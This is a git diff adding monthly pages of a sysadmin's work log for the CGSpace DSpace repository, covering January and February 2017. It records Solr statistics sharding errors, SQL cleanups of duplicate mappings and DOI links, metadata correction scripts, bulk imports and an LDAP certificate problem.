+        at org.apache.http.protocol.HttpRequestExecutor.execute(HttpRequestExecutor.java:121)
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:685)
+        ... 16 more
+
    +
  • And the DSpace log shows:
  • +
+
2017-01-04 22:39:05,412 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
+2017-01-04 22:39:05,412 INFO  org.dspace.statistics.SolrLogger @ Moving: 9318 records into core statistics-2016
+2017-01-04 22:39:07,310 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (java.net.SocketException) caught when processing request to {}->http://localhost:8081: Broken pipe (Write failed)
+2017-01-04 22:39:07,310 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}->http://localhost:8081
+
    +
  • Despite failing instantly, a statistics-2016 directory was created, but it only has a data dir (no conf)
  • +
  • The Tomcat access logs show more:
  • +
+
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
+127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-17YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 423
+127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 77
+127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
+127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 4359517
+127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16248
+127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
+127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update?wt=javabin&version=2 HTTP/1.1" 200 41
+127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update HTTP/1.1" 200 40
+
    +
  • Very interesting… it creates the core and then fails somehow
  • +
+

2017-01-08

+
    +
  • Deployed Sisay’s item-view.xsl code that shows mapped collections on CGSpace (#295)
  • +
+

2017-01-09

+
    +
  • A user wrote to tell me that the new display of an item’s mappings had a crazy bug for at least one item: https://cgspace.cgiar.org/handle/10568/78596
  • +
  • She said she only mapped it once, but it appears to be mapped 184 times
  • +
+

Crazy item mapping

+

2017-01-10

+
    +
  • I tried to clean up the duplicate mappings by exporting the item’s metadata to CSV, editing, and re-importing, but DSpace said “no changes were detected”
  • +
  • I’ve asked on the dspace-tech mailing list to see if anyone can help
  • +
  • I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help
  • +
  • For example, this shows 186 mappings for the item, the first three of which are real:
  • +
+
dspace=#  select * from collection2item where item_id = '80596';
+
    +
  • Then I deleted the others:
  • +
+
dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
+
    +
  • And in the item view it now shows the correct mappings
  • +
  • I will have to ask the DSpace people if this is a valid approach
  • +
  • Finish looking at the Journal Title corrections of the top 500 Journal Titles so we can make a controlled vocabulary from it
  • +
+

2017-01-11

+ +
Traceback (most recent call last):
+  File "./fix-metadata-values.py", line 80, in <module>
+    print("Fixing {} occurences of: {}".format(records_to_fix, record[0]))
+UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
+
    +
  • Seems we need to encode as UTF-8 before printing to screen, ie:
  • +
+
print("Fixing {} occurences of: {}".format(records_to_fix, record[0].encode('utf-8')))
+
    +
  • See: http://stackoverflow.com/a/36427358/487333
  • +
  • I’m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database… I’ve never had this issue before
  • +
  • Now back to cleaning up some journal titles so we can make the controlled vocabulary:
  • +
+
$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
+
    +
  • Now get the top 500 journal titles:
  • +
+
dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
+
    +
  • The values are a bit dirty and outdated, since the file I had given to Abenet and Peter was from November
  • +
  • I will have to go through these and fix some more before making the controlled vocabulary
  • +
  • Added 30 more corrections or so, now there are 49 total and I’ll have to get the top 500 after applying them
  • +
+

2017-01-13

+ +

2017-01-16

+
    +
  • Fix the two items Maria found with duplicate mappings with this script:
  • +
+
/* 184 incorrect mappings: https://cgspace.cgiar.org/handle/10568/78596 */
+delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
+/* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
+delete from collection2item where id = '91082';
+

2017-01-17

+
    +
  • Helping clean up some file names in the 232 CIAT records that Sisay worked on last week
  • +
  • There are about 30 files with %20 (space) and Spanish accents in the file name
  • +
  • At first I thought we should fix these, but actually the W3C prescribes converting these to UTF-8 and URL encoding them!
  • +
  • And the file names don’t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore
  • +
  • Seems like the only ones I should replace are the ' apostrophe characters, as %27:
  • +
+
value.replace("'",'%27')
+
    +
  • Add the item’s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:
  • +
+
value + "__description:" + cells["dc.type"].value
+
    +
  • Test importing of the new CIAT records (actually there are 232, not 234):
  • +
+
$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
+
    +
  • Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB
  • +
  • These are scanned from paper and likely have no compression, so we should test whether these compression techniques help without compromising the quality too much:
  • +
+
$ convert -compress Zip -density 150x150 input.pdf output.pdf
+$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf
+
    +
  • Someone on the Internet suggested using a DPI of 144
  • +
+

2017-01-19

+
    +
  • In testing a random sample of CIAT’s PDFs for compressibility, it looks like all of these methods generally increase the file size, so we will just import them as they are
  • +
  • Import 232 CIAT records into CGSpace:
  • +
+
$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
+

2017-01-22

+
    +
  • Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace and carriage return characters from Excel’s CSV exporter)
  • +
  • There were also some issues with an invalid dc.date.issued field, and I trimmed leading / trailing whitespace and cleaned up some URLs with unneeded parameters like ?show=full (see the GREL sketch below)
  • +
+
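    +
  • If doing those cleanups in OpenRefine, they are simple GREL transforms, roughly (a sketch, not the exact steps I ran):
  • +
+
value.trim()
+value.replace("?show=full", "")
+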

2017-01-23

+
    +
  • I merged Atmire’s pull request into the development branch so they can deploy it on DSpace Test
  • +
  • Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):
  • +
+
$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child="$community" && /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child="$community"; done
+
+
10568/42161 10568/171 10568/79341
+10568/41914 10568/171 10568/79340
+

2017-01-24

+
    +
  • Run all updates on DSpace Test and reboot the server
  • +
  • Run fixes for Journal titles on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
+
    +
  • Create a new list of the top 500 journal titles from the database:
  • +
+
dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
+
    +
  • Then sort them in OpenRefine and create a controlled vocabulary by manually adding the XML markup (the format is sketched below), pull request (#298)
  • +
  • This would be the last issue remaining to close the meta issue about switching to controlled vocabularies (#69)
  • +
+
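    +
  • The controlled vocabulary XML is just nested node elements, roughly like this (a sketch with placeholder journal titles, not the actual file from #298):
  • +
+
<node id="journal-titles" label="Journal Titles">
+  <isComposedBy>
+    <node id="Agricultural Systems" label="Agricultural Systems"/>
+    <node id="Food Policy" label="Food Policy"/>
+  </isComposedBy>
+</node>
+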

2017-01-25

+
    +
  • Atmire says the com.atmire.statistics.util.UpdateSolrStorageReports and com.atmire.utils.ReportSender are no longer necessary because they are using a Spring scheduler for these tasks now
  • +
  • Pull request to remove them from the Ansible templates: https://github.com/ilri/rmg-ansible-public/pull/80
  • +
  • Still testing the Atmire modules on DSpace Test, and it looks like a few issues we had reported are now fixed: +
      +
    • XLS Export from Content statistics
    • +
    • Most popular items
    • +
    • Show statistics on collection pages
    • +
    +
  • +
  • But now we have a new issue with the “Types” in Content statistics not being respected—we only get the defaults, despite having custom settings in dspace/config/modules/atmire-cua.cfg
  • +
+

2017-01-27

+
    +
  • Magdalena pointed out that somehow the Anonymous group had been added to the Administrators group on CGSpace (!)
  • +
  • Discuss plans to update CCAFS metadata and communities for their new flagships and phase II project identifiers
  • +
  • The flagships are in cg.subject.ccafs, and we need to probably make a new field for the phase II project identifiers
  • +
+

2017-01-28

+
    +
  • Merge controlled vocabulary for journal titles (dc.source) into CGSpace (#298)
  • +
  • Merge new CIAT subject into CGSpace (#296)
  • +
+

2017-01-29

+
    +
  • Run all system updates on DSpace Test, redeploy DSpace code, and reboot the server
  • +
  • Run all system updates on CGSpace, redeploy DSpace code, and reboot the server
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2017-02/index.html b/docs/2017-02/index.html new file mode 100644 index 000000000..994aafadd --- /dev/null +++ b/docs/2017-02/index.html @@ -0,0 +1,477 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + February, 2017 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

February, 2017

+ +
+

2017-02-07

+
    +
  • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
  • +
+
dspace=# select * from collection2item where item_id = '80278';
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+
    +
  • Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
  • +
  • Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name
  • +
+

2017-02-08

+
    +
  • We also need to rename some of the CCAFS Phase I flagships: +
      +
    • CLIMATE-SMART AGRICULTURAL PRACTICES → CLIMATE-SMART TECHNOLOGIES AND PRACTICES
    • +
    • CLIMATE RISK MANAGEMENT → CLIMATE SERVICES AND SAFETY NETS
    • +
    • LOW EMISSIONS AGRICULTURE → LOW EMISSIONS DEVELOPMENT
    • +
    • POLICIES AND INSTITUTIONS → PRIORITIES AND POLICIES FOR CSA
    • +
    +
  • +
  • The climate risk management one doesn’t exist, so I will have to ask Magdalena if they want me to add it to the input forms
  • +
  • Start testing some nearly 500 author corrections that CCAFS sent me:
  • +
+
$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
+

2017-02-09

+
    +
  • More work on CCAFS Phase II stuff
  • +
  • Looks like simply adding a new metadata field to dspace/config/registries/cgiar-types.xml and restarting DSpace causes the field to get added to the registry (a sketch of such an entry is below)
  • +
  • It requires a restart but at least it allows you to manage the registry programmatically
  • +
  • It’s not a very good way to manage the registry, though, as removing a field from the XML doesn’t remove it from the registry, and since we always restore from database backups there would never be a scenario where we need these to be created
  • +
  • Testing some corrections on CCAFS Phase II flagships (cg.subject.ccafs):
  • +
+
$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
+
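    +
  • For reference, a registry entry in that file looks roughly like this (a sketch using the planned cg.identifier.ccafsprojectpii field; the scope note is made up):
  • +
+
<dc-type>
+  <schema>cg</schema>
+  <element>identifier</element>
+  <qualifier>ccafsprojectpii</qualifier>
+  <scope_note>CCAFS Phase II project identifier</scope_note>
+</dc-type>
+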

2017-02-10

+
    +
  • CCAFS said they want to wait on the flagship updates (cg.subject.ccafs) on CGSpace, perhaps for a month or so
  • +
  • Help Marianne Gadeberg (WLE) with some user permissions as it seems she had previously been using a personal email account, and is now on a CGIAR one
  • +
  • I manually added her new account to ~25 authorizations that her old user was on
  • +
+

2017-02-14

+
    +
  • Add SCALING to ILRI subjects (#304), as Sisay’s attempts were all sloppy
  • +
  • Cherry pick some patches from the DSpace 5.7 branch: +
      +
    • DS-3363 CSV import error says “row”, means “column”: f7b6c83e991db099003ee4e28ca33d3c7bab48c0
    • +
    • DS-3479 avoid adding empty metadata values during import: 329f3b48a6de7fad074d825fd12118f7e181e151
    • +
    • [DS-3456] 5x Clarify command line options for statisics import/export tools (#1623): 567ec083c8a94eb2bcc1189816eb4f767745b278
    • +
    • [DS-3458]5x Allow Shard Process to Append to an existing repo: 3c8ecb5d1fd69a1dcfee01feed259e80abbb7749
    • +
    +
  • +
  • I still need to test these, especially the last two, which change some things related to Solr maintenance
  • +
+

2017-02-15

+ +

2017-02-16

+
    +
  • Looking at memory info from munin on CGSpace:
  • +
+

CGSpace meminfo

+
    +
  • We are using only ~8GB of RAM for applications, and 16GB for caches!
  • +
  • The Linode machine we’re on has 24GB of RAM but only because that’s the only instance that had enough disk space for us (384GB)…
  • +
  • We should probably look into Google Compute Engine or Digital Ocean where we can get more storage without having to follow a linear increase in instance pricing for CPU/memory as well
  • +
  • Especially because we only use 2 out of 8 CPUs basically:
  • +
+

CGSpace CPU

+
    +
  • Fix issue with a duplicate declaration in the atmire-dspace-xmlui pom.xml (causing non-fatal warnings during the Maven build)
  • +
  • Experiment with making DSpace generate HTTPS handle links, first a change in dspace.cfg or the site’s properties file:
  • +
+
handle.canonical.prefix = https://hdl.handle.net/
+
    +
  • And then a SQL command to update existing records:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
+UPDATE 58193
+
    +
  • Seems to work fine!
  • +
  • I noticed a few items that have incorrect DOI links (dc.identifier.doi), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:
  • +
+
dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
+
    +
  • This will replace any that begin with 10. and change them to https://dx.doi.org/10.:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
+
    +
  • This will get any that begin with doi:10. and change them to https://dx.doi.org/10.x:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
+
    +
  • Fix DOIs like dx.doi.org/10. to be https://dx.doi.org/10.:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
+
    +
  • Fix DOIs like http//:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
+
    +
  • Fix DOIs like dx.doi.org./:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%'
+
    +
  • Delete some invalid DOIs:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
+
    +
  • Fix some other random outliers:
  • +
+
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
+dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
+dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
+dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
+dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
+dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
+
    +
  • And do another round of http:// → https:// cleanups:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
+
    +
  • Run all DOI corrections on CGSpace
  • +
  • Something to think about here is to write a Curation Task in Java to do these sanity checks / corrections every night
  • +
  • Then we could add a cron job for them and run them from the command line like this noop example (a possible cron.d entry is sketched below):
  • +
+
[dspace]/bin/dspace curate -t noop -i 10568/79891
+
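    +
  • A possible cron.d entry for that, assuming such a task existed (the fix-dois task name is hypothetical and would first need to be written and registered in dspace/config/modules/curate.cfg; 10568/0 being the site handle):
  • +
+
# /etc/cron.d/dspace-curation: hypothetical, the fix-dois task does not exist yet
+0 2 * * * tomcat7 /home/cgspace.cgiar.org/bin/dspace curate -t fix-dois -i 10568/0 -r -
+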

2017-02-20

+
    +
  • Run all system updates on DSpace Test and reboot the server
  • +
  • Run CCAFS author corrections on DSpace Test and CGSpace and force a full discovery reindex
  • +
  • Fix label of CCAFS subjects in Atmire Listings and Reports module
  • +
  • Help Sisay with SQL commands
  • +
  • Help Paola from CCAFS with the Atmire Listings and Reports module
  • +
  • Testing the fix-metadata-values.py script on macOS and it seems like we don’t need to use .encode('utf-8') anymore when printing strings to the screen
  • +
  • It seems this might have only been a temporary problem, as both Python 3.5.2 and 3.6.0 are able to print the problematic string “Entwicklung & Ländlicher Raum” without the encode() call, but print it as a bytes object when encode() is used:
  • +
+
$ python
+Python 3.6.0 (default, Dec 25 2016, 17:30:53)
+>>> print('Entwicklung & Ländlicher Raum')
+Entwicklung & Ländlicher Raum
+>>> print('Entwicklung & Ländlicher Raum'.encode())
+b'Entwicklung & L\xc3\xa4ndlicher Raum'
+
    +
  • So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really was a temporary problem, perhaps due to macOS or the Python build I was using.
  • +
+

2017-02-21

+
    +
  • Testing regenerating PDF thumbnails, like I started in 2016-11
  • +
  • It seems there is a bug in filter-media that causes it to process formats that aren’t part of its configuration:
  • +
+
$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p "ImageMagick PDF Thumbnail"
+File: earlywinproposal_esa_postharvest.pdf.jpg
+FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
+File: postHarvest.jpg.jpg
+FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
+
    +
  • According to dspace.cfg the ImageMagick PDF Thumbnail plugin should only process PDFs:
  • +
+
filter.org.dspace.app.mediafilter.ImageMagickImageThumbnailFilter.inputFormats = BMP, GIF, image/png, JPG, TIFF, JPEG, JPEG 2000
+filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = Adobe PDF
+
    +
  • I’ve sent a message to the mailing list and might file a Jira issue
  • +
  • Ask Atmire about the failed interpolation of the dspace.internalUrl variable in atmire-cua.cfg
  • +
+

2017-02-22

+
    +
  • Atmire said I can add dspace.internalUrl to my build properties and the error will go away
  • +
  • It should be the local URL for accessing Tomcat from the server’s own perspective, ie: http://localhost:8080
  • +
+

2017-02-26

+
    +
  • Find all fields with “http://hdl.handle.net” values (most are in dc.identifier.uri, but some are in other URL-related fields like cg.link.reference, cg.identifier.dataurl, and cg.identifier.url):
  • +
+
dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
+UPDATE 58633
+
    +
  • This works but I’m thinking I’ll wait on the replacement as there are perhaps some other places that rely on http://hdl.handle.net (grep the code, it’s scary how many things are hard coded)
  • +
  • Send message to dspace-tech mailing list with concerns about this
  • +
+

2017-02-27

+
    +
  • LDAP users cannot log in today, looks to be an issue with CGIAR’s LDAP server:
  • +
+
$ openssl s_client -connect svcgroot2.cgiarad.org:3269
+CONNECTED(00000003)
+depth=0 CN = SVCGROOT2.CGIARAD.ORG
+verify error:num=20:unable to get local issuer certificate
+verify return:1
+depth=0 CN = SVCGROOT2.CGIARAD.ORG
+verify error:num=21:unable to verify the first certificate
+verify return:1
+---
+Certificate chain
+ 0 s:/CN=SVCGROOT2.CGIARAD.ORG
+   i:/CN=CGIARAD-RDWA-CA
+---
+
    +
  • For some reason it is now signed by a private certificate authority
  • +
  • This error seems to have started on 2017-02-25:
  • +
+
$ grep -c "unable to find valid certification path" [dspace]/log/dspace.log.2017-02-*
+[dspace]/log/dspace.log.2017-02-01:0
+[dspace]/log/dspace.log.2017-02-02:0
+[dspace]/log/dspace.log.2017-02-03:0
+[dspace]/log/dspace.log.2017-02-04:0
+[dspace]/log/dspace.log.2017-02-05:0
+[dspace]/log/dspace.log.2017-02-06:0
+[dspace]/log/dspace.log.2017-02-07:0
+[dspace]/log/dspace.log.2017-02-08:0
+[dspace]/log/dspace.log.2017-02-09:0
+[dspace]/log/dspace.log.2017-02-10:0
+[dspace]/log/dspace.log.2017-02-11:0
+[dspace]/log/dspace.log.2017-02-12:0
+[dspace]/log/dspace.log.2017-02-13:0
+[dspace]/log/dspace.log.2017-02-14:0
+[dspace]/log/dspace.log.2017-02-15:0
+[dspace]/log/dspace.log.2017-02-16:0
+[dspace]/log/dspace.log.2017-02-17:0
+[dspace]/log/dspace.log.2017-02-18:0
+[dspace]/log/dspace.log.2017-02-19:0
+[dspace]/log/dspace.log.2017-02-20:0
+[dspace]/log/dspace.log.2017-02-21:0
+[dspace]/log/dspace.log.2017-02-22:0
+[dspace]/log/dspace.log.2017-02-23:0
+[dspace]/log/dspace.log.2017-02-24:0
+[dspace]/log/dspace.log.2017-02-25:7
+[dspace]/log/dspace.log.2017-02-26:8
+[dspace]/log/dspace.log.2017-02-27:90
+
    +
  • Also, it seems that we need to use a different user for LDAP binds, as we’re still using the temporary one from the root migration, so maybe we can go back to the previous user we were using
  • +
  • So it looks like the certificate is invalid AND the bind users we had been using were deleted
  • +
  • Biruk Debebe recreated the bind user and now we are just waiting for CGNET to update their certificates
  • +
  • Regarding the filter-media issue I found earlier, it seems that the ImageMagick PDF plugin will also process JPGs if they are in the “Content Files” (aka ORIGINAL) bundle
  • +
  • The problem likely lies in the logic of ImageMagickThumbnailFilter.java, as ImageMagickPdfThumbnailFilter.java extends it
  • +
  • Run CIAT corrections on CGSpace
  • +
+
dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
+
    +
  • CGNET has fixed the certificate chain on their LDAP server
  • +
  • Redeploy CGSpace and DSpace Test to on latest 5_x-prod branch with fixes for LDAP bind user
  • +
  • Run all system updates on CGSpace server and reboot
  • +
+

2017-02-28

+
    +
  • After running the CIAT corrections and updating the Discovery and authority indexes, there is still no change in the number of items listed for CIAT in Discovery
  • +
  • Ah, this is probably because some items have the International Center for Tropical Agriculture author twice, which I first noticed in 2016-12 but couldn’t figure out how to fix
  • +
  • I think I can do it by first exporting all metadatavalues that have the author International Center for Tropical Agriculture
  • +
+
